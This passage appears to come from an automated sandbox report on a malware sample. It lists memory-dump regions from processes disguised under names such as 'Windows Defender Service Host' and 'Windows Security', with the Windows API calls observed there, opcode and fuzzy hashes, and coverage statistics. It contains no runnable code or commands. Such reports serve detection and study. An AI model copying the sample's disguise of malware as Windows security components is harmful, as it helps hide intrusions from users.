                                                    • Opcode ID: 0f62f078fdbf86220ea2b30131eace09b36a576b408016a99e83e4a703192c45
                                                    • Instruction ID: 74f72096902ad34c140efc636170ff775b9ed8e5a55016fe52fdd2896c256bcf
                                                    • Opcode Fuzzy Hash: 0f62f078fdbf86220ea2b30131eace09b36a576b408016a99e83e4a703192c45
                                                    • Instruction Fuzzy Hash: 7D2113B1C0065A9BCB14DF9AC544AAEFBF4FF48720F14856AD918A7241D778A940CFE1

                                                    Control-flow Graph

                                                    APIs
                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0159FDE5), ref: 0159FE68
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2839872705.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1590000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: 97edf9fdb53f303ba2aa5ce5ac6d80a6b9ee2a2d34a6a11b5488ee784ade7687
                                                    • Instruction ID: 2469e4d327de448b112b2bd43a1274ca02387a733d04db3a3829a4cff37387b1
                                                    • Opcode Fuzzy Hash: 97edf9fdb53f303ba2aa5ce5ac6d80a6b9ee2a2d34a6a11b5488ee784ade7687
                                                    • Instruction Fuzzy Hash: 922132B1C0065A9BDB14CFAAC5447AEBFF0BB48720F14812AD918A7241D338A940CFA1

                                                    Control-flow Graph

                                                    APIs
                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0159FDE5), ref: 0159FE68
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2839872705.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1590000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: aa06fb4d0804f6ddd95c8bc07c55f78e4d2380011686589499ddc5797da3b63c
                                                    • Instruction ID: 81f4a3b88ad230842517110f87adb6b0f8f51d30f892f9a15fbfe6f286a3bed2
                                                    • Opcode Fuzzy Hash: aa06fb4d0804f6ddd95c8bc07c55f78e4d2380011686589499ddc5797da3b63c
                                                    • Instruction Fuzzy Hash: 7E117CB2D0061A8FDF14DFA9D5047AEBBE0FF48720F05815AD508EB252D738A945CFA2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2838322358.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_152d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 69456d2ef3d792e6d0c13781465f2c3813aa3d402bac5964b024544d4787f167
                                                    • Instruction ID: 730ba1e7c27b9d455b5ea3010bc04fcd035ab21e795c7bc646932311100b4deb
                                                    • Opcode Fuzzy Hash: 69456d2ef3d792e6d0c13781465f2c3813aa3d402bac5964b024544d4787f167
                                                    • Instruction Fuzzy Hash: C3212872604204DFDB05DF98D9C0F1ABFB5FB89318F208569E9090F296C37AD456CBA2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2838322358.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_152d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8198bd90dab3fec3a5806fa6add5e46091df755a788154c1cd58f0ca7562db41
                                                    • Instruction ID: d161e903443e5220d1b9907f9a2bdbacd7fc332346aedde477901af2d6e7b9c8
                                                    • Opcode Fuzzy Hash: 8198bd90dab3fec3a5806fa6add5e46091df755a788154c1cd58f0ca7562db41
                                                    • Instruction Fuzzy Hash: 9E210372504204DFDB05DF98D9C0B6ABFB5FB99320F20C569E9090F296C37AE456C6E1
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2838322358.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_152d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction ID: e682f94c113d467bd01d6220bc90cd0071f131d76198334feacb701b258ffc6e
                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction Fuzzy Hash: 2D11AF76504280CFDB16CF54D5C4B1ABF71FB89314F2486A9D9094F256C33AD45ACBA2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2838322358.000000000152D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0152D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_152d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction ID: 96b0b3c90c534dd87af205c166f08541339cd09782d6d53c7ec5e03da942718e
                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction Fuzzy Hash: D911DF72404240CFCB02CF44D5C4B5ABF72FB84320F24C6A9D9090B696C33AE45ACBA2

                                                    Execution Graph

                                                    Execution Coverage:20.9%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:3
                                                    Total number of Limit Nodes:0

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.4552904367.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_7ff848f10000_Windows Defender Service Host.jbxd
                                                    Similarity
                                                    • API ID: HookWindows
                                                    • String ID:
                                                    • API String ID: 2559412058-0
                                                    • Opcode ID: ddf3da39afa85b8019bc3ea54e4233012e8432fd8e5c6e2deab10f86b5300fc7
                                                    • Instruction ID: 9cc08d37395eb9d2044c8b30ebf5738ce4faef2551467ba03ea57b5169abeb51
                                                    • Opcode Fuzzy Hash: ddf3da39afa85b8019bc3ea54e4233012e8432fd8e5c6e2deab10f86b5300fc7
                                                    • Instruction Fuzzy Hash: D141083191CA5D4FDB58EBAC98466F9BBE1EB59321F00027ED049D3292CF74A8528BC5

                                                    Execution Graph

                                                    Execution Coverage:6.5%
                                                    Dynamic/Decrypted Code Coverage:97.9%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:97
                                                    Total number of Limit Nodes:6

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4537701929.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_6070000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ?$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                    • API String ID: 0-1152698448
                                                    • Opcode ID: 84c933efab37bc2b95aa632776d84eb29ebe3ff3293a7c6bc537420efa562d25
                                                    • Instruction ID: 6e3978b84fd1e4672cf7d5413faa6d44b17225bfe1dca1cefd03bee79271f004
                                                    • Opcode Fuzzy Hash: 84c933efab37bc2b95aa632776d84eb29ebe3ff3293a7c6bc537420efa562d25
                                                    • Instruction Fuzzy Hash: D0F17FB0F802058FEB589FA9C944A6EBBF6FF84700F148519E4069B3A5CB75EC41CB95

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4537701929.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_6070000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ?$$]q$$]q$$]q$$]q$$]q
                                                    • API String ID: 0-4101917017
                                                    • Opcode ID: 18b87163e40c3ece2cc17b3a6b75e177bf2e6dec290a6e127fc7e8ba83f31255
                                                    • Instruction ID: 3ed7cf8349c85d74341917f7b84467155d097b555e1c53432c8cf36fa964e590
                                                    • Opcode Fuzzy Hash: 18b87163e40c3ece2cc17b3a6b75e177bf2e6dec290a6e127fc7e8ba83f31255
                                                    • Instruction Fuzzy Hash: B59105B0F807058FEB458B69C850BAE7FB6FF85304F144666D002DB3A2CA75ED4687A5

                                                    Control-flow Graph

                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0503A43E
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4536087503.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_5030000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: a8c640e60b353cffa9476b26bf4206118fbb016877d27f1d4369010b666ea95b
                                                    • Instruction ID: a848261d17a7eaad990213e91c39585b0f136053a24d0e30feaa4c3b130cc171
                                                    • Opcode Fuzzy Hash: a8c640e60b353cffa9476b26bf4206118fbb016877d27f1d4369010b666ea95b
                                                    • Instruction Fuzzy Hash: 9D817970A00B058FD764DF6AE44579ABBFAFF88304F00892DE48AD7A50D779E945CB90

                                                    Control-flow Graph (interactive graph rendering with executed / not-executed node legend not reproduced; basic-block edge dump omitted)
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 049C3401
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4518464899.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_49c0000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 8a08709357dc0f76aa4e2478c5a20971444047465dc7ff9cb02115655ed26e96
                                                    • Instruction ID: d86b99ac1282831900c387e1d2d75db9a4e50e05840f887c85a440399f60f79b
                                                    • Opcode Fuzzy Hash: 8a08709357dc0f76aa4e2478c5a20971444047465dc7ff9cb02115655ed26e96
                                                    • Instruction Fuzzy Hash: 214102B1C00719CBDB25DFA9C8487DEBBF5BF48304F20846AD418AB251D779694ACF91

                                                    Control-flow Graph (interactive graph rendering with executed / not-executed node legend not reproduced; basic-block edge dump omitted)
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0503C8E2
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4536087503.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_5030000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 73cda8b65ce259788674085df6e7ba72112ae28d39b6804accf83b249ea2bd5f
                                                    • Instruction ID: 1e68dae52123a8e6d3918e4defaafbafdf68495b6c1abb42ff25f0c7e5036e15
                                                    • Opcode Fuzzy Hash: 73cda8b65ce259788674085df6e7ba72112ae28d39b6804accf83b249ea2bd5f
                                                    • Instruction Fuzzy Hash: E951B2B1D003099FDB14CF99D884ADEBFB5BF48310F24812AE819BB210D775A945CF90

                                                    Control-flow Graph (interactive graph rendering with executed / not-executed node legend not reproduced; basic-block edge dump omitted)
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0503C8E2
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4536087503.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_5030000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: b944bb6c389742cc8255fd87bfe2ec38222b3cc01f1bf5c1cef22d75e6fe63f3
                                                    • Instruction ID: e57d53162bca323dff42f6f1c9172243095bd1a4a177fc448f2af80ecba49fd6
                                                    • Opcode Fuzzy Hash: b944bb6c389742cc8255fd87bfe2ec38222b3cc01f1bf5c1cef22d75e6fe63f3
                                                    • Instruction Fuzzy Hash: FE41B0B1D003499FDB14CF9AD884ADEBBF5BF48310F24812AE819BB210D775A985CF90
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 0503EE51
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4536087503.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_5030000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID:
                                                    • API String ID: 2714655100-0
                                                    • Opcode ID: e4d579cb37863606ba8023ed393a49ae2c268983c5d3a0d5747ce960c8bd1a08
                                                    • Instruction ID: e4118da0e0d7c46943daa9ecec41a111f9a0983875ec8282431dac62d911aa3b
                                                    • Opcode Fuzzy Hash: e4d579cb37863606ba8023ed393a49ae2c268983c5d3a0d5747ce960c8bd1a08
                                                    • Instruction Fuzzy Hash: 6C4138B4A00305CFDB14DF99D449AAEBBF9FF88314F24C559E519A7321D374A845CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4518464899.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_49c0000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b8013c0e338e45396d57c165bac7201d0d0dbdca33dd5a22619a7e0a9ffb1e2a
                                                    • Instruction ID: c5470b927d74f3974dc7a332f82f20c2bbcd7c903328d681b76d302deda2cfa0
                                                    • Opcode Fuzzy Hash: b8013c0e338e45396d57c165bac7201d0d0dbdca33dd5a22619a7e0a9ffb1e2a
                                                    • Instruction Fuzzy Hash: D941E071C04248CFDB22DFE8C8547DDBBB1EF46314F1085AEC845AB241D77AA946CB42
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 049C3401
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4518464899.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_49c0000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: e5da61c5aed281137848e76503181837fa12ad0492e7d213aa2e95599c199984
                                                    • Instruction ID: 749c7e212426d7c90a06bc99f41007e613d0efe84a7f4da3a61f9ac4492d2381
                                                    • Opcode Fuzzy Hash: e5da61c5aed281137848e76503181837fa12ad0492e7d213aa2e95599c199984
                                                    • Instruction Fuzzy Hash: 9B41E2B0C0071DCBDB25DFA9C844B9DBBF6BF49304F20846AD808AB255DB756946CF91
                                                    APIs
                                                    • DeleteFileW.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,049CFDE5), ref: 049CFE68
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4518464899.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_49c0000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: 993588c6c6334ef68654b1afe23677aace336da2595e59283f1585d5fed7eadf
                                                    • Instruction ID: 891b51c5bcab66d4edd161a075bc29ae0cf95fd86afd45ac6eafb6321fbd76d4
                                                    • Opcode Fuzzy Hash: 993588c6c6334ef68654b1afe23677aace336da2595e59283f1585d5fed7eadf
                                                    • Instruction Fuzzy Hash: 401129735047544FD7125B6998143EABFE6AF82314F05847AC9489B292DA28E84B87E3
                                                    APIs
                                                    • DeleteFileW.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,049CFDE5), ref: 049CFE68
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4518464899.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_49c0000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: a045bd7cf74178e1ec57197adcc0273120a4eb56da5c4cf9227f27e0a541886d
                                                    • Instruction ID: 86fc4cc0feec8882aa9dcbb7e49ad9eaec2ad4554e39c0511d7f33407aa91703
                                                    • Opcode Fuzzy Hash: a045bd7cf74178e1ec57197adcc0273120a4eb56da5c4cf9227f27e0a541886d
                                                    • Instruction Fuzzy Hash: 362133B1C0061A9BCB14DF9AC444AAEFBB5EF48720F10816AD818A7245D738A940CFE2
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0503A4B9,00000800,00000000,00000000), ref: 0503A6AA
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4536087503.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_5030000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 4a6b4ed0c8b506872bbbcad0d52a338d89ec6051911518a95974df99a0caba20
                                                    • Instruction ID: 1e54b875adaba7b111486030559e5ce1c905d0a471c7d04e00bdeeb6c5da2f9b
                                                    • Opcode Fuzzy Hash: 4a6b4ed0c8b506872bbbcad0d52a338d89ec6051911518a95974df99a0caba20
                                                    • Instruction Fuzzy Hash: 3011E4B6D002099FDB10DF9AD844ADEFBF8EB88310F10842AE959A7210C379A545CFA5
                                                    APIs
                                                    • DeleteFileW.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,049CFDE5), ref: 049CFE68
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4518464899.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_49c0000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: 99218ccf29cd75eedf552a76cdde22aa5b776576fbaaad5799cd06647850b6cb
                                                    • Instruction ID: ede02459bcdaf46fff05d16610c2898564bcdba6265515ea83836714f99aa659
                                                    • Opcode Fuzzy Hash: 99218ccf29cd75eedf552a76cdde22aa5b776576fbaaad5799cd06647850b6cb
                                                    • Instruction Fuzzy Hash: BA2147B1C00659CBDB14DFAAC54879EFBB4FF48320F14812AD818B3281D338A944CFA1
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0503A4B9,00000800,00000000,00000000), ref: 0503A6AA
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4536087503.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_5030000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: ff681a2c53cc079bbcf308e0ace424c5988b9a503ea4709f6e1c78db1fe492ad
                                                    • Instruction ID: 9dc84bc74930ab4ac7c0cc35226f95c8ab5db4285f7c87dd65e9fa29e42398d5
                                                    • Opcode Fuzzy Hash: ff681a2c53cc079bbcf308e0ace424c5988b9a503ea4709f6e1c78db1fe492ad
                                                    • Instruction Fuzzy Hash: 641112B6D042088FDB10DF9AD444A9EFBF8EB88310F10842AE959A7200C379A945CFA5
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0503A43E
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4536087503.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_5030000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 05a58b2fefb3a4e637737919fc8c505180f71921198f88ee7439660a91a98ad2
                                                    • Instruction ID: e722f5b4c00d366ccce03023d0a71c4b498b6ec6b2197c5dfe4f54f73276575c
                                                    • Opcode Fuzzy Hash: 05a58b2fefb3a4e637737919fc8c505180f71921198f88ee7439660a91a98ad2
                                                    • Instruction Fuzzy Hash: 3611E0B5D002498FDB10DF9AD448BDEFBF9EF88314F10842AD959A7210C379A545CFA1
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4463515938.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_a2d000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6099cfa59f922f58cbdbed3520e8afb6de881ae530e8a54624a70ab09a6bdd45
                                                    • Instruction ID: 71c10f73f5bd8306493e153f909dfa88b4df1be25126916e8592b668f8e99173
                                                    • Opcode Fuzzy Hash: 6099cfa59f922f58cbdbed3520e8afb6de881ae530e8a54624a70ab09a6bdd45
                                                    • Instruction Fuzzy Hash: 20212271504204DFDB05DF18E9C0F26BFA5FB98328F208579E9090B25BC37AD856DBA2
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4463952444.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_a3d000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: da587ebf49400d78569dd7d2416a5c0b814cd45b1326d24635f514ec3091aaa7
                                                    • Instruction ID: af8bd104f61eeb346db19cdc32437457ce6813f965db1a8b1a93905561a797fe
                                                    • Opcode Fuzzy Hash: da587ebf49400d78569dd7d2416a5c0b814cd45b1326d24635f514ec3091aaa7
                                                    • Instruction Fuzzy Hash: D72104B5604304DFCB05DF24E5C0B26BB65FB88314F20C96DE9094B256C37AE846DB62
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4463515938.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_a2d000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction ID: c6081a4088f7c488dd053ab7341cd054bcc4437fd9657117cc269f8a063aae8f
                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction Fuzzy Hash: 5A11D376504280CFDB16CF14D5C4B16BF72FB98314F24C6A9D9094B257C33AD85ACBA2
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4463952444.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_a3d000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                    • Instruction ID: e17b650398fe82e0b0691e2abae2c0303ab2af4252e7e79c5ca437a5baa11088
                                                    • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                    • Instruction Fuzzy Hash: 5A119075504240DFDB05CF14D5C4B15BF72FB84314F24C6AEE9494B656C33AE84ACB62
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4463952444.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_a3d000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4d6d706680f1a354718e9451116aeb665d2b5e688806b10e669e5ff6fc35a46e
                                                    • Instruction ID: dcd9a79c329cc1f1dfb586c21125f4c43f333a343ee8fe2d8452591f50905e14
                                                    • Opcode Fuzzy Hash: 4d6d706680f1a354718e9451116aeb665d2b5e688806b10e669e5ff6fc35a46e
                                                    • Instruction Fuzzy Hash: A1018FB5504240DFCB04CFA4E5C4A16BFA1EF84324F28C5AEEC494F25AC23BE416CB51
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 05032F46
                                                    • GetCurrentThread.KERNEL32 ref: 05032F83
                                                    • GetCurrentProcess.KERNEL32 ref: 05032FC0
                                                    • GetCurrentThreadId.KERNEL32 ref: 05033019
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4536087503.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_5030000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 9ce6d32efa77d4232bf0207893a7428145b9f1457aadf6f11707ce46c8ff2384
                                                    • Instruction ID: f888afa557658733576b1fde0465c9ea3ce5dd164919ceddf30a54d0c6d90e11
                                                    • Opcode Fuzzy Hash: 9ce6d32efa77d4232bf0207893a7428145b9f1457aadf6f11707ce46c8ff2384
                                                    • Instruction Fuzzy Hash: 6B5146B49042498FEB04DFA9E549BDEBBF5FF49304F208469E009A7360D778A944CB65
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 05032F46
                                                    • GetCurrentThread.KERNEL32 ref: 05032F83
                                                    • GetCurrentProcess.KERNEL32 ref: 05032FC0
                                                    • GetCurrentThreadId.KERNEL32 ref: 05033019
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4536087503.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_5030000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 322346f4115b20c4962ccd50e81eb216b13a6817b038c2548af63a2e7bf336cc
                                                    • Instruction ID: 8ba3014258d8a75c662436b5b83915b77dda2a486afda42eb6b632eb5f465ebc
                                                    • Opcode Fuzzy Hash: 322346f4115b20c4962ccd50e81eb216b13a6817b038c2548af63a2e7bf336cc
                                                    • Instruction Fuzzy Hash: 455158B4904309CFDB54DFAAE549BAEBBF5FF48304F208469E009A7360D778A944CB65
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 44d078d601305d0d22ec75ead97db14dccbe3f15c710a3e47a7a76fde8d41582
                                                    • Instruction ID: ae23d0f35578cbf472d5f3815de19e552bd7e3e7fada7acfd9b052f4d67e5eca
                                                    • Opcode Fuzzy Hash: 44d078d601305d0d22ec75ead97db14dccbe3f15c710a3e47a7a76fde8d41582
                                                    • Instruction Fuzzy Hash: DC916370B006185BDB1ADFB498516AF7BE2EF84704B04C91DE14AAB740DF34AE06CBD6
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ea5f690d8c5f27820840f0e8201308e8a59072d4f7428042ac4dfdda2826ae0c
